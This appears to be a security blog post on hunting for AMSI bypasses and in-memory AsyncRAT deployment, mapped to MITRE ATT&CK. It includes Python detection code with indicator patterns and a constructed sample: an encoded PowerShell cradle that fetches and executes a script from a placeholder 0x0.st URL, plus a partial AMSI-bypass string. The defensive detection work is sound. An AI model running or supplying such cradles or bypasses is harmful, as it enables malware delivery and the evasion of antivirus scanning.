Threat Hunting - Detecting AMSI Bypass and AsyncRAT Deployment

In our previous blog post, we followed a sophisticated threat hunting approach and explained how a threat hunter goes looking for advanced persistent threats, which goes well beyond what an ordinary SIEM alert can do. Here at SofectaLabs, we combine AI, automation, and human creativity to find hidden detection gaps that other systems miss because of rigid rules. In this post, I will discuss in detail how our approach works in practice and what it looks like in the field. We will provide some examples, describe the supporting technologies, and outline our process for defining suspicions so that action can be taken before an attacker inflicts significant damage.

This post presents a technical dive into AMSI bypass techniques and AsyncRAT deployment, mapped through MITRE ATT&CK and combining a look at detection with visual elements tailored for professional threat hunters.

Fileless Attack Chains: AMSI/ETW Evasion and In-Memory AsyncRAT Deployment

Recent threat campaigns have increasingly leveraged AsyncRAT, an open-source C# remote access trojan, using AMSI (Antimalware Scan Interface) bypass techniques to evade detection. In early 2025, attackers used anime-themed .LNK shortcut files (e.g., “sasuke wallpaper.lnk”) to lure users. Clicking the file triggered obfuscated PowerShell scripts that loaded additional payloads into memory, leaving minimal forensic traces. The final stage deployed AsyncRAT, granting attackers remote access to the victim's machine.

A notable technique involves using the Null-AMSI tool, which disables both AMSI and ETW (Event Tracing for Windows), allowing PowerShell scripts and memory-based loaders to operate without triggering antivirus or logging. 

Similar tactics were observed in other concurrent campaigns, including one analyzed by SonicWall, where a VBScript dropper led to an AMSI bypass script downloaded from 0x0.st and ultimately executed a RAT payload, either Remcos or AsyncRAT.

These campaigns reflect a growing trend of fileless, in-memory malware execution, where attackers systematically bypass built-in Windows defenses. A typical attack chain includes:

[Figure: AMSI Bypass and AsyncRAT attack flow]

By operating entirely in memory and suppressing system monitoring, these campaigns achieve stealth, persistence, and command-and-control communications with little to no antivirus detection.

Hypothesis-Driven threat hunting and MITRE ATT&CK

Adversaries may attempt to bypass AMSI by injecting a null parameter (e.g., amsiInitFailed) using a PowerShell script, and then deploy AsyncRAT to gain persistence and remote control over the compromised system.

To understand how this behavior can be observed in practice, we’ve mapped the attack chain using the MITRE ATT&CK framework. Rather than providing specific detection queries, we highlight key telemetry points and artifacts that can serve as investigation starting points.

In modern cybersecurity, hypothesis-driven threat hunting has become essential to uncover advanced persistent threats (APTs) that bypass traditional security controls. By formulating targeted hypotheses based on emerging tactics, techniques, and procedures (TTPs), defenders can detect stealthy activity, improve visibility, and strengthen detection engineering.

[Figure: Attack Matrix for AsyncRAT]

Detecting AMSI Bypass and AsyncRAT Activity

While AMSI bypass techniques are designed to avoid detection, they inevitably leave subtle traces in system telemetry. By correlating these traces, threat hunters can identify the full attack chain — from initial script execution to in-memory payload deployment and command-and-control (C2) communication.

Key telemetry signals include:

  • PowerShell Operational Logs (Event ID 4103/4104): If Script Block Logging is enabled, analysts can capture suspicious script patterns such as reflective access to AmsiUtils, manipulation of amsiInitFailed, or raw memory operations like VirtualProtect or Marshal::Copy. These often appear obfuscated, but even partial matches or Base64-encoded blobs combined with binary logic can warrant further investigation.
  • Process Creation Events (Sysmon Event ID 1 / Windows EID 4688): Look for PowerShell executions with -ExecutionPolicy Bypass, Invoke-WebRequest, or embedded IEX commands pulling scripts from external sources like 0x0.st or GitHub’s raw content URLs. These patterns are common in AMSI bypass download cradles.
  • Memory Modification and DLL Loading: AMSI bypass often includes in-memory patching of amsi.dll. If advanced EDR or Sysmon is configured, memory tampering (Sysmon EID 10) within PowerShell or related script hosts can indicate in-process patching. In some cases, AsyncRAT variants inject into trusted processes like aspnet_compiler.exe, which may also be detected via unusual parent-child process relationships.
  • Persistence Artifacts: Once deployed, AsyncRAT often establishes persistence via startup scripts or scheduled tasks. Look for files like StartupScript_<random>.ps1 or dwm.bat in startup folders, or task creation events (Windows EID 4698) triggering PowerShell or batch script execution. These artifacts are rare in normal user behavior and often signal malware staging.
  • C2 Communication and Network Activity: Although AsyncRAT’s traffic is usually encrypted (SSL/TLS), destination analysis can reveal anomalies. Campaigns have been observed using TryCloudflare tunnels (e.g., subdomains of cfargotunnel.com) to disguise beaconing. DNS and proxy logs can help link suspicious outbound traffic back to script execution timelines.

By piecing together these telemetry indicators, defenders can reconstruct a comprehensive picture of malicious activity. An AMSI bypass may start with a PowerShell script, lead to memory patching, establish persistence, and eventually result in encrypted C2 traffic—each step leaving behind a footprint. Recognizing and correlating these signals is key to identifying stealthy threats like AsyncRAT.
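As an added illustration of the correlation described above (example code written for this post's topic, not code from the original article or from any referenced tool), the following Python scores a single Event ID 4104 script block against the indicators listed in the bullets, after collapsing 'Amsi' + 'Utils' style string concatenation and decoding -EncodedCommand Base64 blobs so that partial or hidden matches still surface. The indicator weights and the sample script blocks are constructed for this example.

```python
import base64
import re

# Indicator patterns taken from the telemetry bullets above; the weights are hypothetical.
INDICATORS = [
    ("AmsiUtils", r"amsiutils", 3),
    ("amsiInitFailed", r"amsiinitfailed", 3),
    ("VirtualProtect", r"virtualprotect", 2),
    ("Marshal::Copy", r"marshal\]?::copy", 2),
    ("ExecutionPolicy Bypass", r"-executionpolicy\s+bypass", 1),
    ("IEX", r"\biex\b", 1),
    ("0x0.st", r"0x0\.st", 2),
]
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def normalize(script: str) -> str:
    # Collapse 'Amsi' + 'Utils' style concatenation, repeating until the text stops changing.
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", script)
    return script

def decode_blobs(script: str) -> list[str]:
    # Decode Base64 blobs as UTF-16LE, the encoding PowerShell's -EncodedCommand uses.
    out = []
    for blob in B64_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():  # drop blobs that are not really encoded script text
            out.append(text)
    return out

def scan_script_block(script: str) -> dict:
    # Score one Event ID 4104 script block over its raw, de-obfuscated and decoded views.
    views = [normalize(script)] + [normalize(t) for t in decode_blobs(script)]
    hits = {}
    for view in views:
        for name, pattern, weight in INDICATORS:
            if re.search(pattern, view, re.IGNORECASE):
                hits[name] = weight
    return {"score": sum(hits.values()), "hits": sorted(hits)}

# Constructed sample script blocks (not real captures); the cradle is wrapped as -EncodedCommand.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://0x0.st/PLACEHOLDER')"
SAMPLE_SPLIT = "$t = 'Amsi' + 'Utils'; $f = 'amsiInit' + 'Failed'  # remainder elided"
SAMPLE_ENCODED = ("powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
                  + base64.b64encode(CRADLE.encode("utf-16-le")).decode())
```

Running `scan_script_block` over the two samples shows the split-string block scoring on AmsiUtils and amsiInitFailed, and the encoded block scoring on the Bypass flag plus the IEX and 0x0.st indicators recovered from the decoded cradle.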

In a Nutshell: Detecting AMSI Bypass and AsyncRAT via Hypothesis-Driven Hunting

This article explains how hypothesis-driven threat hunting can reveal stealthy threats like AMSI bypass techniques and the deployment of AsyncRAT malware that operates in memory and evades traditional security controls.

The core hypothesis is that attackers may attempt to disable AMSI by injecting a null parameter, then use PowerShell to deploy AsyncRAT for persistence and remote control over compromised systems.

Detection focuses on identifying subtle signs left in telemetry, including:

  • PowerShell logs showing indicators like amsiInitFailed, null, or Bypass
  • Process relationships where PowerShell launches AsyncRAT
  • Registry keys or mutexes indicating malware persistence
  • DNS queries to known dynamic DNS domains, such as duckdns.org or no-ip.com

These signals provide crucial breadcrumbs, but how do we turn them into scalable, actionable detection logic?

Stay tuned: in a follow-up blog post, we’ll dive into how we use Elasticsearch and ES|QL to operationalize these insights and build efficient hunting workflows.
